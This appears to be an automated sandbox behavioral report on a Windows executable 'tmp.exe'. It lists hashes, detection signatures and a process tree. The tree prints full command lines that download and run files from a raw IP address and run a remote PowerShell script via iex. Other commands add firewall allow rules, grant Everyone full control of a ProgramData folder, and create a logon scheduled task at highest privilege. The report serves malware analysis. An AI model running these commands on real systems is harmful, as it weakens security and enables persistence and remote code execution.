Analysis
-
max time kernel
74s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2022 12:43
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
General
-
Target
tmp.exe
-
Size
532KB
-
MD5
cba9caa64e418a546044daa8744800b3
-
SHA1
72060361b8a025ea3e132f6015cb20a87d3dff44
-
SHA256
9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
-
SHA512
aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
-
SSDEEP
12288:u5m8ZlWk6VT6qIm9qCZb5rTa8kdVXpP1PIU/bB6h1a15:5O+DD9qCZb5rTa8UPPRP/bkar
Malware Config
Extracted
https://chocolatey.org/install.ps1
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 1264 powershell.exe 7 1264 powershell.exe 13 1264 powershell.exe 15 1264 powershell.exe 17 1264 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
wget.exewget.exechoco.exepid process 1912 wget.exe 3780 wget.exe 4092 choco.exe -
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 4268 netsh.exe 3424 netsh.exe 1504 netsh.exe 644 netsh.exe -
Possible privilege escalation attempt 19 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 4288 icacls.exe 1320 icacls.exe 5016 icacls.exe 3060 icacls.exe 2240 icacls.exe 2056 icacls.exe 4280 takeown.exe 2120 icacls.exe 1188 icacls.exe 1264 takeown.exe 3660 icacls.exe 4088 takeown.exe 2128 icacls.exe 1412 icacls.exe 4224 icacls.exe 992 icacls.exe 5116 takeown.exe 3468 takeown.exe 4544 icacls.exe -
Processes:
resource yara_rule behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp upx C:\ProgramData\zem\wget.exe upx C:\ProgramData\zem\wget.exe upx behavioral2/memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmp upx C:\ProgramData\zem\wget.exe upx behavioral2/memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral2/memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmp upx C:\ProgramData\zem\tmp.exe upx behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp upx behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp upx -
Modifies file permissions 1 TTPs 19 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 5116 takeown.exe 3468 takeown.exe 4544 icacls.exe 1264 takeown.exe 2056 icacls.exe 5016 icacls.exe 3060 icacls.exe 2240 icacls.exe 2128 icacls.exe 2120 icacls.exe 1412 icacls.exe 4288 icacls.exe 1320 icacls.exe 1188 icacls.exe 3660 icacls.exe 4224 icacls.exe 4088 takeown.exe 992 icacls.exe 4280 takeown.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp autoit_exe behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp autoit_exe behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp autoit_exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1264 powershell.exe 1264 powershell.exe 4464 powershell.exe 4464 powershell.exe 1340 powershell.exe 1340 powershell.exe 2552 powershell.exe 2552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeIncreaseQuotaPrivilege 2552 powershell.exe Token: SeSecurityPrivilege 2552 powershell.exe Token: SeTakeOwnershipPrivilege 2552 powershell.exe Token: SeLoadDriverPrivilege 2552 powershell.exe Token: SeSystemProfilePrivilege 2552 powershell.exe Token: SeSystemtimePrivilege 2552 powershell.exe Token: SeProfSingleProcessPrivilege 2552 powershell.exe Token: SeIncBasePriorityPrivilege 2552 powershell.exe Token: SeCreatePagefilePrivilege 2552 powershell.exe Token: SeBackupPrivilege 2552 powershell.exe Token: SeRestorePrivilege 2552 powershell.exe Token: SeShutdownPrivilege 2552 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeSystemEnvironmentPrivilege 2552 powershell.exe Token: SeRemoteShutdownPrivilege 2552 powershell.exe Token: SeUndockPrivilege 2552 powershell.exe Token: SeManageVolumePrivilege 2552 powershell.exe Token: 33 2552 powershell.exe Token: 34 2552 powershell.exe Token: 35 2552 powershell.exe Token: 36 2552 powershell.exe Token: SeIncreaseQuotaPrivilege 2552 powershell.exe Token: SeSecurityPrivilege 2552 powershell.exe Token: SeTakeOwnershipPrivilege 2552 powershell.exe Token: SeLoadDriverPrivilege 2552 powershell.exe Token: SeSystemProfilePrivilege 2552 powershell.exe Token: SeSystemtimePrivilege 2552 powershell.exe Token: SeProfSingleProcessPrivilege 2552 powershell.exe Token: SeIncBasePriorityPrivilege 2552 powershell.exe Token: SeCreatePagefilePrivilege 2552 powershell.exe Token: SeBackupPrivilege 2552 powershell.exe Token: SeRestorePrivilege 2552 powershell.exe Token: SeShutdownPrivilege 2552 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeSystemEnvironmentPrivilege 2552 powershell.exe Token: SeRemoteShutdownPrivilege 2552 powershell.exe Token: SeUndockPrivilege 2552 powershell.exe Token: SeManageVolumePrivilege 2552 powershell.exe Token: 33 2552 powershell.exe Token: 34 2552 powershell.exe Token: 35 2552 powershell.exe Token: 36 2552 powershell.exe Token: SeIncreaseQuotaPrivilege 2552 powershell.exe Token: SeSecurityPrivilege 2552 powershell.exe Token: SeTakeOwnershipPrivilege 2552 powershell.exe Token: SeLoadDriverPrivilege 2552 powershell.exe Token: SeSystemProfilePrivilege 2552 powershell.exe Token: SeSystemtimePrivilege 2552 powershell.exe Token: SeProfSingleProcessPrivilege 2552 powershell.exe Token: SeIncBasePriorityPrivilege 2552 powershell.exe Token: SeCreatePagefilePrivilege 2552 powershell.exe Token: SeBackupPrivilege 2552 powershell.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
tmp.exepid process 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe -
Suspicious use of SendNotifyMessage 35 IoCs
Processes:
tmp.exepid process 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe 4720 tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4720 wrote to memory of 1864 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1864 4720 tmp.exe cmd.exe PID 1864 wrote to memory of 644 1864 cmd.exe netsh.exe PID 1864 wrote to memory of 644 1864 cmd.exe netsh.exe PID 4720 wrote to memory of 1084 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1084 4720 tmp.exe cmd.exe PID 1084 wrote to memory of 4268 1084 cmd.exe netsh.exe PID 1084 wrote to memory of 4268 1084 cmd.exe netsh.exe PID 4720 wrote to memory of 388 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 388 4720 tmp.exe cmd.exe PID 388 wrote to memory of 3424 388 cmd.exe netsh.exe PID 388 wrote to memory of 3424 388 cmd.exe netsh.exe PID 4720 wrote to memory of 1180 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1180 4720 tmp.exe cmd.exe PID 1180 wrote to memory of 1504 1180 cmd.exe netsh.exe PID 1180 wrote to memory of 1504 1180 cmd.exe netsh.exe PID 4720 wrote to memory of 1912 4720 tmp.exe wget.exe PID 4720 wrote to memory of 1912 4720 tmp.exe wget.exe PID 4720 wrote to memory of 1912 4720 tmp.exe wget.exe PID 4720 wrote to memory of 3780 4720 tmp.exe wget.exe PID 4720 wrote to memory of 3780 4720 tmp.exe wget.exe PID 4720 wrote to memory of 3780 4720 tmp.exe wget.exe PID 4720 wrote to memory of 2960 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 2960 4720 tmp.exe cmd.exe PID 2960 wrote to memory of 4280 2960 cmd.exe takeown.exe PID 2960 wrote to memory of 4280 2960 cmd.exe takeown.exe PID 4720 wrote to memory of 3820 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 3820 4720 tmp.exe cmd.exe PID 3820 wrote to memory of 3660 3820 cmd.exe icacls.exe PID 3820 wrote to memory of 3660 3820 cmd.exe icacls.exe PID 4720 wrote to memory of 4780 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 4780 4720 tmp.exe cmd.exe PID 4780 wrote to memory of 5016 4780 cmd.exe icacls.exe PID 4780 wrote to memory of 5016 4780 cmd.exe icacls.exe PID 4720 wrote to memory of 1340 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1340 4720 tmp.exe cmd.exe PID 1340 wrote to memory of 2120 1340 cmd.exe icacls.exe PID 1340 wrote to memory of 2120 1340 cmd.exe icacls.exe PID 4720 wrote to memory of 1644 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1644 4720 tmp.exe cmd.exe PID 1644 wrote to memory of 5116 1644 cmd.exe takeown.exe PID 1644 wrote to memory of 5116 1644 cmd.exe takeown.exe PID 4720 wrote to memory of 4796 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 4796 4720 tmp.exe cmd.exe PID 4796 wrote to memory of 1188 4796 cmd.exe icacls.exe PID 4796 wrote to memory of 1188 4796 cmd.exe icacls.exe PID 4720 wrote to memory of 3476 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 3476 4720 tmp.exe cmd.exe PID 3476 wrote to memory of 3060 3476 cmd.exe icacls.exe PID 3476 wrote to memory of 3060 3476 cmd.exe icacls.exe PID 4720 wrote to memory of 1292 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 1292 4720 tmp.exe cmd.exe PID 1292 wrote to memory of 3468 1292 cmd.exe takeown.exe PID 1292 wrote to memory of 3468 1292 cmd.exe takeown.exe PID 4720 wrote to memory of 3596 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 3596 4720 tmp.exe cmd.exe PID 3596 wrote to memory of 4544 3596 cmd.exe icacls.exe PID 3596 wrote to memory of 4544 3596 cmd.exe icacls.exe PID 4720 wrote to memory of 4356 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 4356 4720 tmp.exe cmd.exe PID 4356 wrote to memory of 1412 4356 cmd.exe icacls.exe PID 4356 wrote to memory of 1412 4356 cmd.exe icacls.exe PID 4720 wrote to memory of 4684 4720 tmp.exe cmd.exe PID 4720 wrote to memory of 4684 4720 tmp.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=%allusersprofile%\zem\wget.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="upwget" dir=in action=allow program=C:\ProgramData\zem\wget.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=%allusersprofile%\zem\time_cli.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=C:\ProgramData\zem\time_cli.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=%allusersprofile%\zem\up2batdownload.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\ProgramData\zem\up2batdownload.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\ProgramData\zem\wget.exeC:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_up2bat64atstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/bat/update64.bat2⤵
- Executes dropped EXE
-
C:\ProgramData\zem\wget.exeC:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_cmdhatstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/prg/cmdh.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem /D Y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:F /T2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /T /inheritance:r3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:(OI)(CI)F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\log /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:F /T2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:(OI)(CI)F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\upd /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:F /T2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:(OI)(CI)F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /T /inheritance:r3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y2⤵
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\log /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y2⤵
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\upd /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player Updater" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Adobe Flash Player Updater" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_uninstall_java" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_uninstall_java" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_java64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_java64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_firefox64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_firefox64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_vlc64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_vlc64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_foxitreader_latest" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_foxitreader_latest" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ax" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player_ax" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ppapi" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player_ppapi" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_7z64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_7z64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_run" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_run" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy /Y /Z C:\Users\Admin\AppData\Local\Temp\tmp.exe %ALLUSERSPROFILE%\zem\up2batdownload.exe2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) && SET PATH=%PATH%;%systemdrive%\chocolatey\bin2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmp" "c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMP"5⤵
-
C:\Windows\System32\setx.exe"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934484078047"4⤵
-
C:\Windows\System32\setx.exe"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934498296854"4⤵
-
C:\ProgramData\chocolatey\choco.exe"C:\ProgramData\chocolatey\choco.exe" -v4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell cinst powershell -y2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell cinst powershell -y3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo chocolatey >> %ALLUSERSPROFILE%\zem\log\not_in_right_dir_chocolatey.txt2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c %ALLUSERSPROFILE%\zem\run.bat2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Set-ExecutionPolicy RemoteSigned -force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell C:\ProgramData\zem\start.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\zem\update64.bat2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\zem\start.bat1⤵
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /RU Admin /TN "test_n_timecli" /TR "C:\ProgramData\zem\time_cli.exe" /F /RL HIGHEST2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
